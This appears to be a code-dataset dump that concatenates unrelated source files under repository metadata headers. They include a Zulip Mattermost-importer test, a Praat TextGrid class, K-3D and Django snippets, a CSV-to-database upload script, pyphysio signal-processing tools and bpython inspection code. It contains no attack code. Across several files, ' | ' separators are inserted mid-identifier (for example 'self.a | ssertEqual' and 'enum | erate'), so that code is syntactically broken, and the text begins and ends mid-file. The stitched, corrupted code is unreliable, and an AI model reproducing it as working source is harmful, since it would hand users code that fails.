_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="id", is_o |
tommyip/zulip | zerver/tests/test_mattermost_importer.py | Python | apache-2.0 | 22,277 | 0.002693 | import os
import ujson
import filecmp
import logging
from typing import Dict, Any, List
from zerver.lib.import_realm import (
do_import_realm,
)
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.data_import.mattermost_user import UserHandler
from zerver.data_import.mattermost import mattermost_data_file_to_dict, process_user, convert_user_data, \
create_username_to_user_mapping, label_mirror_dummy_users, reset_mirror_dummy_users, \
convert_channel_data, write_emoticon_data, get_mentioned_user_ids, check_user_in_team, \
build_reactions, get_name_to_codepoint_dict, do_convert_data
from zerver.data_import.sequencer import IdMapper
from zerver.data_import.import_util import SubscriberHandler
from zerver.models import Reaction, UserProfile, Message, get_realm
class MatterMostImporter(ZulipTestCase):
logger = logging.getLogger()
# set logger to a higher level to suppress 'logger.INFO' outputs
logger.setLevel(logging.WARNING)
def setUp(self) -> None:
fixture_file_name = self.fixture_file_name("export.json", "mattermost_fixtures")
self.mattermost_data = mattermost_data_file_to_dict(fixture_file_name)
self.username_to_user = create_username_to_user_mapping(self.mattermost_data["user"])
reset_mirror_dummy_users(self.username_to_user)
def test_mattermost_data_file_to_dict(self) -> None:
self.assertEqual(len(self.mattermost_data), 6)
self.assertEqual(self.mattermost_data["version"], [1])
self.assertEqual(len(self.mattermost_data["team"]), 2)
self.assertEqual(self.mattermost_data["team"][0]["name"], "gryffindor")
self.assertEqual(len(self.mattermost_data["channel"]), 5)
self.assertEqual(self.mattermost_data["channel"][0]["name"], "gryffindor-common-room")
self.assertEqual(self.mattermost_data["channel"][0]["team"], "gryffindor")
self.assertEqual(len(self.mattermost_data["user"]), 5)
self.assertEqual(self.mattermost_data["user"][1]["username"], "harry")
self.assertEqual(len(self.mattermost_data["user"][1]["teams"]), 1)
self.assertEqual(len(self.mattermost_data["post"]), 20)
self.assertEqual(self.mattermost_data["post"][0]["team"], "gryffindor")
self.assertEqual(self.mattermost_data["post"][0]["channel"], "dumbledores-army")
self.assertEqual(self.mattermost_data["post"][0]["user"], "harry")
self.assertEqual(len(self.mattermost_data["post"][0]["replies"]), 1)
self.assertEqual(len(self.mattermost_data["emoji"]), 2)
self.assertEqual(self.mattermost_data["emoji"][0]["name"], "peerdium")
def test_process_user(self) -> None:
user_id_mapper = IdMapper()
harry_dict = self.username_to_user["harry"]
harry_dict["is_mirror_dummy"] = False
realm_id = 3
team_name = "gryffindor"
user = process_user(harry_dict, realm_id, team_name, user_id_mapper)
self.assertEqual(user["avatar_source"], 'G')
self.assertEqual(user["delivery_email"], "harry@zulip.com")
self.assertEqual(user["email"], "harry@zulip.com")
self.assertEqual(user["full_name"], "Harry Potter")
self.assertEqual(user["id"], 1)
self.assertEqual(user["is_active"], True)
self.assertEqual(user["is_realm_admin"], True)
self.assertEqual(user["is_guest"], False)
self.assertEqual(user["is_mirror_dummy"], False)
self.assertEqual(user["realm"], 3)
self.assertEqual(user["short_name"], "harry")
self.assertEqual(user["timezone"], "UTC")
team_name = "slytherin"
snape_dict = self.username_to_user["snape"]
snape_dict["is_mirror_dummy"] = True
user = process_user(snape_dict, realm_id, team_name, user_id_mapper)
self.assertEqual(user["avatar_source"], 'G')
self.assertEqual(user["delivery_email"], "snape@zulip.com")
self.assertEqual(user["email"], "snape@zulip.com")
self.assertEqual(user["full_name"], "Severus Snape")
self.assertEqual(user["id"], 2)
self.assertEqual(user["is_active"], False)
self.assertEqual(user["is_realm_admin"], False)
self.assertEqual(user["is_guest"], False)
self.assertEqual(user["is_mirror_dummy"], True)
self.assertEqual(user["realm"], 3)
self.assertEqual(user["short_name"], "snape")
self.assertEqual(user["timezone"], "UTC")
def test_convert_user_data(self) -> None:
user_id_mapper = IdMapper()
realm_id = 3
team_name = "gryffindor"
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertTrue(user_id_mapper.has("harry"))
self.assertTrue(user_id_mapper.has("ron"))
self.assertEqual(user_handler.get_user(user_id_mapper.get("harry"))["full_name"], "Harry Potter")
self.assertEqual(user_handler.get_user(user_id_mapper.get("ron"))["full_name"], "Ron Weasley")
team_name = "slytherin"
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertEqual(len(user_handler.get_all_users()), 3)
self.assertTrue(user_id_mapper.has("malfoy"))
self.assertTrue(user_id_mapper.has("pansy"))
self.assertTrue(user_id_mapper.has("snape"))
team_name = "gryffindor"
# Snape is a mirror dummy user in Harry's team.
label_mirror_dummy_users(team_name, self.mattermost_data, self.username_to_user)
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertEqual(len(user_handler.get_all_users()), 3)
self.assertTrue(user_id_mapper.has("snape"))
team_name = "slytherin"
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertEqual(len(user_handler.get_all_users()), 3)
def test_convert_channel_data(self) -> None:
user_handler = UserHandler()
subscriber_handler = SubscriberHandler()
stream_id_mapper = IdMapper()
user_id_mapper = IdMapper()
team_name = "gryffindor"
convert_user_data(
user_handler=user_handler,
user_id_mapper=user_id_mapper,
user_data_map=self.username_to_user,
realm_id=3,
team_name=team_name,
)
zerver_stream = convert_channel_data(
channel_data=self.mattermost_data["channel"],
user_data_map=self.username_to_user,
subscriber_handler=subscriber_handler,
stream_id_mapper=stream_id_mapper,
user_id_mapper=user_id_mapper,
realm_id=3,
team_name=team_name,
)
self.assertEqual(len(zerver_stream), 3)
self.assertEqual(zerver_stream[0]["name"], "Gryffindor common room")
self.assertEqual(zerver_stream[0]["invite_only"], False)
self.assertEqual(zerver_stream[0]["descrip | tion"], "A place for talking about Gryffindor common room")
self.assertEqual(zerver_stream[0]["rendered_description"], "")
self.assertEqual(zerver_stream[0]["realm"], 3)
self.assertEqual(zerver_stream[1]["name"], "Gryffindor quidditch team")
self.assertEqual(zerver_stream[1]["invite_only"], False)
self.a | ssertEqual(zerver_stream[1]["description"], "A place for talking about Gryffindor quidditch team")
self.assertEqual(zerver_stream[1]["rendered_description"], "")
self.assertEqual(zerver_stream[1]["realm"], 3)
self.assertEqual(zerver_stream[2]["name"], "Dumbledores army")
self.assertEqual(zerver_stream[2]["invite_only"], True)
self.assertEqual(zerver_stream[2]["description"], "A place for talking about Dumbledores army")
self.assertEqual(zerver_stream[2]["rendered_description"], "")
self.assertEqual(zerver_stream[2]["realm"], 3)
self.assertTrue(stream_id_mapper.has("gryffindor-common-room"))
|
dresen/praat | scripts/TextGrid.py | Python | mit | 17,423 | 0.001148 | import codecs
import os
import subprocess
import sys
from Tier import Tier
from Interval import Interval
from operator import itemgetter, attrgetter
from numpy import array as nparray
from praatNumericParser import parse as numParse
from praatPitchParser import parse as pitchParse
SCRIPT = '[TextGrid.py]: '
class Grid(object):
"""
A class for storing a Praat TextGrid and performing data transformations
and analyses. """
def __init__(self, xmin, xmax, size, nid, wav=False, outpath=False):
super(Grid, self).__init__()
self.xmin = xmin
self.xmax = xmax
self.size = size
self.tiers = []
self.id = nid
self.resize()
self.tidx = {}
self.wav = wav
self.outpath = outpath
def __str__(self):
"""Defining print function. Use for diagnostics"""
print("\nTextGrid info:")
print("ID: ", self.id)
if self.wav:
print("Grid sound file: ", self.wav)
print("Grid start: ", self.xmin)
print("Grid end: ", self.xmax)
print("Number of tiers: ", self.size)
print("Current number of tiers: ", self.currentsize)
print("\nCurrent tiers:\n")
for t in self.tiers:
print(t.id)
return ''
def __getitem__(self, key):
return self.tidx[key]
def keys(self):
"""Returns a list of the names of the Tier objects in the Grid"""
return self.tidx.keys()
def addTier(self, newtier):
"""Add a tier to the grid and update the grid size."""
self.tiers.append(newtier)
self.tidx[newtier.id] = newtier
self.resize()
def addWav(self, fp):
"""Associate a wav file to the Grid object."""
assert os.path.exists(fp) == True
self.wav = fp
def resize(self):
"""Update grid size."""
self.currentsize = len(self.tiers)
def printGrid(self, filename, rmtiernames=[]):
"""Print function to output a TextGrid to load into praat."""
if type(filename) == str:
if self.outpath:
fout = codecs.open(
os.path.join(self.outpath, filename), 'w', 'utf8')
else:
fout = codecs.open(filename, 'w', 'utf8')
else:
fout = filename
tierFilter = [self.getTier(x) for x in rmtiernames]
tiers = [x for x in self.tiers if x not in tierFilter]
header = ['File type = "ooTextFile"',
'Object class = "TextGrid"',
'',
'xmin = ' + str(self.xmin),
'xmax = ' + str(self.xmax),
'tiers? <exists>',
'size = ' + str(len(tiers)),
'item []:'
]
fout.write("\n".join(header) + '\n')
for n, t in enumerate(tiers):
fout.write(' ' * 4 + 'item [' + str(n + 1) + ']:\n')
t.printGrid(fout)
fout.close()
def getTier(self, name):
"""Method to retrieve a tier by id ( which is a name ) .
Replaced by the __getitem__() function, but kept for convenience"""
return self.tidx[name]
def extractKaldiData(self, textTierName, recid):
"""Extract segments, uttids and text from the tier that contins text"""
tier = self.tidx[textTierName]
id_length = len(str(tier.size))
text = []
segments = []
uttids = []
for interval in tier.intervals:
uttids.append('-'.join((recid, str(interval.id).zfill(id_length))))
text.append(interval.getText())
segments.append('{:0.3f} {:1.3f}'.format(interval.xmin,
interval.xmax)
)
return (uttids, segments, text, self.wav)
def extractTier(self, srcTiername, name, symbol):
"""Extract a tier from another tier based on the
occurrence of a substring. """
srcTier = self.getTier(srcTiername)
tgtTier = Tier(srcTier.xmin, srcTier.xmax, srcTier.size, name)
for i in srcTier.intervals:
if symbol in i.text:
tgtTier.addInterval(i.copy('"' + symbol + '"'))
else:
tgtTier.addInterval(i.copy('""'))
self.addTier(tgtTier)
def extractMajorityTier(self, srcTiernames, name, symbol, majority):
"""Extract a tier from a set of tiers based on a majority vote of the
occurr ence of the substring in $symbol."""
ntiers = len(srcTiernames)
# Sanity check, cannot ask for a larger majority than there are votes
assert ntiers >= majority
srctiers = [self.getTier(x).intervals for x in srcTiernames]
srcMat = nparray(srctiers)
template = self.getTier(srcTiernames[0])
newtier = Tier(template.xmin, template.xmax, template.size, name)
for j in range(len(srcMat[0])):
anots = sum([1 for x in srcMat[:, j] if symbol in x.text])
if anots >= majority:
newtier.addInterval(template[j].copy('"' + symbol + '"'))
else:
newtier.addInterval(template[j].copy('""'))
self.addTier(newtier)
def extractSegmentTier(self, srcTiernames, name, symbol, majority=1):
"""Collapses adjacent intervals in a tier if they have the same
annotation and updates the tier size. """
assert type(srcTiernames) == list
if len(srcTiernames) > 1:
self.extractMajorityTier(srcTiernames, name, symbol, majority)
else:
self.extractTier(srcTiernames[0], name, symbol)
self.mergeIntervals(name)
def mergeIntervals(self, name):
"""Merges Interval objects in a specific Tier that have the same
annotation. Designed for use with text annotation."""
newtier = self.getTier(name)
seed = newtier[0]
newIntervals = []
for n in range(1, newtier.currentsize):
if seed.text == newtier[n].text:
seed = seed.merge(newtier[n], seed.text)
else:
newIntervals.append(seed)
# Use copy(), otherwise intervals are passed by reference
seed = newtier[n].copy()
newtier.resize(newInterv | als)
def confusionMatrixPair(self, tier1, tier2):
"""Computes the confusion pairs between a pair of tiers."""
assert tier1.size == tier2.size
assert tier1.currentsize == tier2.currentsize
confusiontbl = {}
for n, i in enum | erate(tier1.intervals):
key = tuple(sorted([i.text, tier2[n].text]))
confusiontbl[key] = confusiontbl.get(key, 0) + 1
return confusiontbl
def confusionMatrix(self, tiernames, filename):
"""Computes the confusion pairs between an arbitrary # of tiers."""
mat = {}
ntiers = len(tiernames)
# for each tier to compare
for i in range(ntiers):
# foreach tier that is not $i and has not already been compared
for j in range(i, ntiers):
t1 = self.tidx[tiernames[i]]
t2 = self.tidx[tiernames[j]]
ctbl = self.confusionMatrixPair(t1, t2)
for k in ctbl.keys():
mat[k] = mat.get(k, 0) + ctbl[k]
self.printCMatrix(mat, filename)
def printCMatrix(self, tbl, filename, sep='\t'):
"""Prints a confusion matrix to be loaded by praat."""
if self.outpath:
filename = os.path.join(self.outpath, filename)
fout = codecs.open(filename, 'w', 'utf8')
columns = ('A1', 'A2', 'Count')
fout.write(sep.join(columns) + '\n')
lines = []
for k, v in tbl.items():
lines.append([k[0], k[1], v])
for l in sorted(lines, key=itemgetter(2), reverse=True):
l[2] = str(l[2])
fout.write(sep.join(l) + '\n')
fout.close()
def maceTiers(self, tiernames, filename, sep=','):
"""Output tiers as comma-separated lines into a csv file for Mace."""
annotations = |
K-3D/k3d | tests/mesh/mesh.modifier.MorphPoints.py | Python | gpl-2.0 | 1,275 | 0.00549 | #python
import k3d
import testing
document = k3d.new_document()
source1 = k3d.plugin.create("PolyCone", document)
source2 = k3d.plugin.create("PolySphere", document)
source3 = k3d.plugin.create("PolyCube", document)
modifier = | k3d.plugin.create("MorphPoints", document)
k3d.property.create(modifier, | "k3d::mesh*", "input1", "input1", "input1")
k3d.property.create(modifier, "k3d::mesh*", "input2", "input2", "input2")
k3d.property.create(modifier, "k3d::double_t", "amount1", "amount1", "amount1")
k3d.property.create(modifier, "k3d::double_t", "amount2", "amount2", "amount2")
k3d.property.connect(document, source1.get_property("output_mesh"), modifier.get_property("input_mesh"))
k3d.property.connect(document, source2.get_property("output_mesh"), modifier.get_property("input1"))
k3d.property.connect(document, source3.get_property("output_mesh"), modifier.get_property("input2"))
selection = k3d.geometry.selection.create(0)
point_selection = k3d.geometry.point_selection.create(selection, 1)
modifier.mesh_selection = selection
modifier.amount1 = 0.1
modifier.amount2 = 0.1
testing.require_valid_mesh(document, modifier.get_property("output_mesh"))
testing.require_similar_mesh(document, modifier.get_property("output_mesh"), "mesh.modifier.MorphPoints", 4)
|
pistatium/houkago_app | server_appengine/app/views/aff.py | Python | apache-2.0 | 1,179 | 0.000854 | # coding: utf-8
from __future__ import absolute_import, division, print_function
from django.http import HttpResponseRedirect
from django.views.decorators.cache import cache_page
from djan | go.core.urlresolvers import reverse
from django.conf.urls import patterns
fro | m app.models.app import App
from app import views
# -- Views --------------------------------------------
# ------------------------------------------------------
@cache_page(60 * 5)
def to_home(request, app_id):
app = App.getById(int(app_id))
if app:
app.affiriate_point_total += 2
app.affiriate_point += 2
app.put()
return HttpResponseRedirect(reverse(views.home.index))
@cache_page(60 * 5)
def to_app(request, app_id):
app = App.getById(int(app_id))
if app:
app.affiriate_point_total += 1
app.affiriate_point += 1
app.put()
return HttpResponseRedirect(reverse(views.home.app_detail, args=[app_id]))
# ======================================================================================
'''
URL パターン
'''
urlpatterns = patterns(None,
(r'^/to_home/(\d+)/?$', to_home),
(r'^/to_app/(\d+)/?$', to_app),
)
|
401LearningAnalytics/Project | server_side/upload.py | Python | mit | 2,202 | 0.030427 | #!/usr/bin/env python3
import sys
import os
import subprocess
import time
filename = sys.argv[1]
print("extracting " + filename)
p = subprocess.Popen(["unzip", filename, "-dintro"], stdout=subprocess.PIPE)
p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/courses.csv","courses"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/users.csv","users"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_formative_quiz_grades.csv","course_formative_quiz_grades"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_item_passing_states.csv","course_item_passing_states"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_passing_states.csv","course_passing_states"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.ph | p","intro/course_grades.csv","course_grades"],stdout=subprocess.P | IPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_modules.csv","course_modules"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_lessons.csv","course_lessons"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_items.csv","course_items"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_item_grades.csv","course_item_grades"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_item_types.csv","course_item_types"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
subprocess.call("rm intro/*", shell=True)
|
hacktm15/caudexer | dexer/caudexer/migrations/0003_auto_20151107_1415.py | Python | mit | 589 | 0 | # -*- coding: utf-8 -* | -
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('caudexer', '0002_auto_20151107_1409'),
]
operations = [
migrations.AlterField(
model_name='goodreadsdata',
name='good_reads_id',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='googlebooksdata',
| name='google_book_id',
field=models.CharField(max_length=100),
),
]
|
percyfal/snakemakelib | snakemakelib/exceptions.py | Python | mit | 965 | 0 | # Copyright (C) 2015 by Per Unneberg
class NotInstalledError(Exception):
"""Error thrown if program/command/application cannot be found in path
Args:
msg (str): String described by exception
code (int, optional): Error code, defaults to 2.
"""
def __init__(self, msg, code=2):
self.msg = msg
self.code = code
class SamplesException(Exception):
"""Error thrown if samples missing or wrong number.
Args:
msg (s | tr): String described by exception
code (int, optional): Error code, defaults to 2.
"""
def __init__(self, msg, code=2):
self.msg = msg
self.code = code
class OutputFilesException(Exception):
"""Error thrown if outputfiles missing or wrong number.
Args:
msg (st | r): String described by exception
code (int, optional): Error code, defaults to 2.
"""
def __init__(self, msg, code=2):
self.msg = msg
self.code = code
|
MPBA/pyHRV | pyphysio/tools/Tools.py | Python | gpl-3.0 | 51,184 | 0.004572 | # coding=utf-8
from __future__ import division
import numpy as _np
from scipy.signal import welch as _welch, periodogram as _periodogram, freqz as _freqz
import scipy.optimize as _opt
import pycwt.wavelet as wave
from scipy import linalg as _linalg
import itertools as _itertools
from ..BaseTool import Tool as _Tool
from ..Signal import UnevenlySignal as _UnevenlySignal, EvenlySignal as _EvenlySignal
class Diff(_Tool):
"""
Computes the differences between adjacent samples.
Optional parameters
-------------------
degree : int, >0, default = 1
Sample interval to compute the differences
Returns
-------
signal :
Differences signal.
"""
def __init__(self, degree=1):
assert degree > 0, "The degree value should be positive"
_Tool.__init__(self, degree=degree)
@classmethod
def algorithm(cls, signal, params):
"""
Calculates the differences between consecutive values
"""
degree = params['degree']
sig_1 = signal[:-degree]
sig_2 = signal[degree:]
out = _EvenlySignal(values=sig_2 - sig_1,
sampling_freq=signal.get_sampling_freq(),
signal_type=signal.get_signal_type(),
start_time=signal.get_start_time() + degree / signal.get_sampling_freq())
return out
class PeakDetection(_Tool):
"""
Estimate the maxima and the minima in the signal (in particular for periodic signals).
Parameters
----------
delta : float or list
Threshold for the detection of the peaks. If it is a list it must have the same length of the signal.
Optional parameters
-------------------
refractory : float, >=0, default = 0
Seconds to skip after a detected paek to look for new peaks.
start_max : boolean, default = True
Whether to start looking for a maximum or (False) for a minimum.
Returns
-------
maxp : numpy.array
Array containing indexes of the maxima
minp : numpy.array
Array containing indexes of the minima
maxv : numpy.array
Array containing values of the maxima
minv : numpy.array
Array containing values of the minima
"""
def __init__(self, delta, refractory=0, start_max=True):
delta = _np.array(delta)
assert delta.ndim <= 1, "Delta value should be 1 or 0-dimensional"
assert delta.all() > 0, "Delta value/s should be positive"
| assert refractory >= 0, "Refractory value should be non negative"
_Tool.__init__(self | , delta=delta, refractory=refractory, start_max=start_max)
@classmethod
def algorithm(cls, signal, params):
refractory = params['refractory']
if refractory == 0: # if 0 then do not skip samples
refractory = 1
else: # else transform the refractory from seconds to samples
refractory = refractory * signal.get_sampling_freq()
look_for_max = params['start_max']
delta = params['delta']
minp = []
maxp = []
minv = []
maxv = []
scalar = delta.ndim == 0
if scalar:
d = delta
if len(signal) < 1:
cls.warn("Empty signal (len < 1), returning empty.")
elif not scalar and len(delta) != len(signal):
cls.error("delta vector's length differs from signal's one, returning empty.")
else:
mn_pos_candidate = mx_pos_candidate = 0
mn_candidate = mx_candidate = signal[0]
i_activation_min = 0
i_activation_max = 0
for i in range(1, len(signal)):
sample = signal[i]
if not scalar:
d = delta[i]
if sample > mx_candidate:
mx_candidate = sample
mx_pos_candidate = i
if sample < mn_candidate:
mn_candidate = sample
mn_pos_candidate = i
if look_for_max:
if i >= i_activation_max and sample < mx_candidate - d: # new max
maxp.append(mx_pos_candidate)
maxv.append(mx_candidate)
i_activation_max = i + refractory
mn_candidate = sample
mn_pos_candidate = i
look_for_max = False
else:
if i >= i_activation_min and sample > mn_candidate + d: # new min
minp.append(mn_pos_candidate)
minv.append(mn_candidate)
i_activation_min = i + refractory
mx_candidate = sample
mx_pos_candidate = i
look_for_max = True
return _np.array(maxp), _np.array(minp), _np.array(maxv), _np.array(minv)
class PeakSelection(_Tool):
"""
Identify the start and the end indexes of each peak in the signal, using derivatives.
Parameters
----------
indices : array, >=0
Array containing indexes (first column) and values (second column) of the maxima
win_pre : float, >0
Duration (in seconds) of interval before the peak that is considered to find the start of the peak
win_post : float, >0
Duration (in seconds) of interval after the peak that is considered to find the end of the peak
Returns
-------
starts : array
Array containing start indexes
ends : array
Array containing end indexes
"""
def __init__(self, indices, win_pre, win_post):
indices = _np.array(indices)
assert indices.ndim < 2, "Parameter indices has to be 1 or 0-dimensional"
assert indices.all() >= 0, "Parameter indices contains negative values"
assert win_pre > 0, "Window pre peak value should be positive"
assert win_post > 0, "Window post peak value should be positive"
_Tool.__init__(self, indices=indices, win_pre=win_pre, win_post=win_post)
@classmethod
def algorithm(cls, signal, params):
i_peaks = params['indices']
i_pre_max = int(params['win_pre'] * signal.get_sampling_freq())
i_post_max = int(params['win_post'] * signal.get_sampling_freq())
ZERO = 0.01
i_start = _np.empty(len(i_peaks), int)
i_stop = _np.empty(len(i_peaks), int)
signal_dt = Diff()(signal)
for i in range(len(i_peaks)):
i_pk = int(i_peaks[i])
if i_pk < i_pre_max:
i_st = 0
i_sp = i_pk + i_post_max
elif i_pk >= len(signal_dt) - i_post_max:
i_st = i_pk - i_pre_max
i_sp = len(signal_dt) - 1
else:
i_st = i_pk - i_pre_max
i_sp = i_pk + i_post_max
# find START
signal_dt_pre = signal_dt[i_st:i_pk]
i_pre = len(signal_dt_pre) - 1
# OR below is to allow small fluctuations (?)
while i_pre > 0 and (signal_dt_pre[i_pre] > 0 or abs(signal_dt_pre[i_pre]) <= ZERO):
i_pre -= 1
i_start[i] = i_st + i_pre + 1
# find STOP
signal_dt_post = signal_dt[i_pk: i_sp]
i_post = 1
# OR below is to allow small fluctuations (?)
while i_post < len(signal_dt_post) - 1 and (
signal_dt_post[i_post] < 0 or abs(signal_dt_post[i_post]) <= ZERO):
i_post += 1
i_stop[i] = i_pk + i_post
return i_start, i_stop
class SignalRange(_Tool):
"""
Estimate the local range of the signal by sliding windowing
Parameters
----------
win_len : float, >0
Length of the window in seconds
win_step : float, >0
Shift to start the next window in seconds
Optional parameters
-------------------
smooth : boolean, default=True
Whether to convolve the result with a gaussian window
Returns
-------
deltas : numpy.array
Local range of the signal |
bardlean86/SNEK_TheReckoning | graphics.py | Python | mit | 2,059 | 0.005342 | import os
import pygame as pg
import glob
import constants
pg.display.init()
video = pg.display
screen = video.set_mode(constants.display_size)
""" Preloads images and parameters """
images = glob.glob('*.png')
image_cache = {}
def get_image(path):
img = image_cache.get(path)
path = os.path.join('resources', 'img', img)
if img not in image_cache:
image_cache[path] = pg.image.load(path)
rect = img.get_rect()
size = img.get_size()
return img, rect, size
for pic in images:
get_image(pic)
# Use these manually until I figure out a better solution
img_background = pg.image.load(os.path.join('resources', 'img', 'background.png')).convert()
level_size = img_background.get_size()
level_rect = img_background.get_rect()
img_title_screen = pg.image.load(os.path.join('resources', 'img', 'title.png')).convert()
img_bomb = pg.image.load(os.path.join('resources', 'img', 'bomb.png')).convert_alpha()
bomb_size = img_bomb.get_size()
img_apple = pg.image.load(os.path.join('resources', 'img', 'apple.png')).convert_alpha()
apple_size = img_apple.get_size()
img_head = pg.image.load(os.path.join('resources', 'img', 'snakehead.png')).convert_alpha()
img_body = pg.image.load(os.path.join('resources', 'img', 'snakebody.png')).convert()
img_heart = pg.image.load(os.path.join('resources', 'img', 'heart.png')).convert_alpha()
img_heart = pg.transform.scale(img_heart, (20, 20))
img_dog = pg.image.load(os.path.join('resources', 'img', 'bruh.png')).convert()
img_dog = pg.transform.scale(img_dog, (480, 440))
img_dog_neg = pg.image.load(os.path.join('resources', 'img', 'bruh_neg.png')).convert()
img_dog_neg = pg.transform.scale(img_dog_neg, (480, 440))
img_explosion = pg.image.load(os.path.join('resources', 'img', 'explosion.png')).convert_alpha()
img_explosion = pg.transform.scale2x(img_explosion)
explosion_size = img_explosion.get_size()
img_bullet = pg.image.load(os.path.join('resources', 'img', 'bullet.png')).convert_alpha()
img_time_up = pg.image.load(os.pat | h.join(' | resources', 'img', 'time_up.png')).convert()
|
Shopify/shopify_python_api | test/shipping_zone_test.py | Python | mit | 446 | 0.002242 | import shopify
from test.test_helper import TestCase
class ShippingZoneTes | t(TestCase):
def test_get_shipping_zones(self):
self.fake("shipping_zones", method="GET", body=self.load_fixture("shipping_zones"))
shipping_zones = shopify.ShippingZone.find()
self.assertEqual(1, len(shipping_zones))
self.assertEqual(shipping_zones[0].name, "Some zone")
self.assertEqual(3, len(shipping_zones[0].co | untries))
|
rusucosmin/courses | ubb/fop/2015.Seminar.09/domain/IDObject.py | Python | mit | 514 | 0.005837 | class IDObject():
"""
Base class for all objects having unique id within the application
"""
def __init__(self, objectId):
"""
Constructor method for bui | lding IDObject
objectId - the unique objectId of the object in the app | lication
"""
self._objectId = objectId
def getId(self):
"""
Return the object's unique id
"""
return self._objectId
def testIDObject():
obj = IDObject(133)
assert obj.getId() == 133 |
crakensio/django_training | lib/python2.7/site-packages/bpython/inspection.py | Python | cc0-1.0 | 8,924 | 0.000784 | # Th | e MIT License
#
# Copyright (c) 2009-2011 the bpython authors.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# | furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
from __future__ import with_statement
import collections
import inspect
import keyword
import pydoc
import re
import types
from pygments.token import Token
from bpython._py3compat import PythonLexer, py3
try:
collections.Callable
has_collections_callable = True
except AttributeError:
has_collections_callable = False
try:
types.InstanceType
has_instance_type = True
except AttributeError:
has_instance_type = False
if not py3:
_name = re.compile(r'[a-zA-Z_]\w*$')
class AttrCleaner(object):
"""A context manager that tries to make an object not exhibit side-effects
on attribute lookup."""
def __init__(self, obj):
self.obj = obj
def __enter__(self):
"""Try to make an object not exhibit side-effects on attribute
lookup."""
type_ = type(self.obj)
__getattribute__ = None
__getattr__ = None
# Dark magic:
# If __getattribute__ doesn't exist on the class and __getattr__ does
# then __getattr__ will be called when doing
# getattr(type_, '__getattribute__', None)
# so we need to first remove the __getattr__, then the
# __getattribute__, then look up the attributes and then restore the
# original methods. :-(
# The upshot being that introspecting on an object to display its
# attributes will avoid unwanted side-effects.
if py3 or type_ != types.InstanceType:
__getattr__ = getattr(type_, '__getattr__', None)
if __getattr__ is not None:
try:
setattr(type_, '__getattr__', (lambda *_, **__: None))
except TypeError:
__getattr__ = None
__getattribute__ = getattr(type_, '__getattribute__', None)
if __getattribute__ is not None:
try:
setattr(type_, '__getattribute__', object.__getattribute__)
except TypeError:
# XXX: This happens for e.g. built-in types
__getattribute__ = None
self.attribs = (__getattribute__, __getattr__)
# /Dark magic
def __exit__(self, exc_type, exc_val, exc_tb):
"""Restore an object's magic methods."""
type_ = type(self.obj)
__getattribute__, __getattr__ = self.attribs
# Dark magic:
if __getattribute__ is not None:
setattr(type_, '__getattribute__', __getattribute__)
if __getattr__ is not None:
setattr(type_, '__getattr__', __getattr__)
# /Dark magic
class _Repr(object):
"""
Helper for `fixlongargs()`: Returns the given value in `__repr__()`.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
return self.value
__str__ = __repr__
def parsekeywordpairs(signature):
tokens = PythonLexer().get_tokens(signature)
preamble = True
stack = []
substack = []
parendepth = 0
for token, value in tokens:
if preamble:
if token is Token.Punctuation and value == u"(":
preamble = False
continue
if token is Token.Punctuation:
if value in [u'(', u'{', u'[']:
parendepth += 1
elif value in [u')', u'}', u']']:
parendepth -= 1
elif value == ':' and parendepth == -1:
# End of signature reached
break
if ((value == ',' and parendepth == 0) or
(value == ')' and parendepth == -1)):
stack.append(substack)
substack = []
continue
if value and (parendepth > 0 or value.strip()):
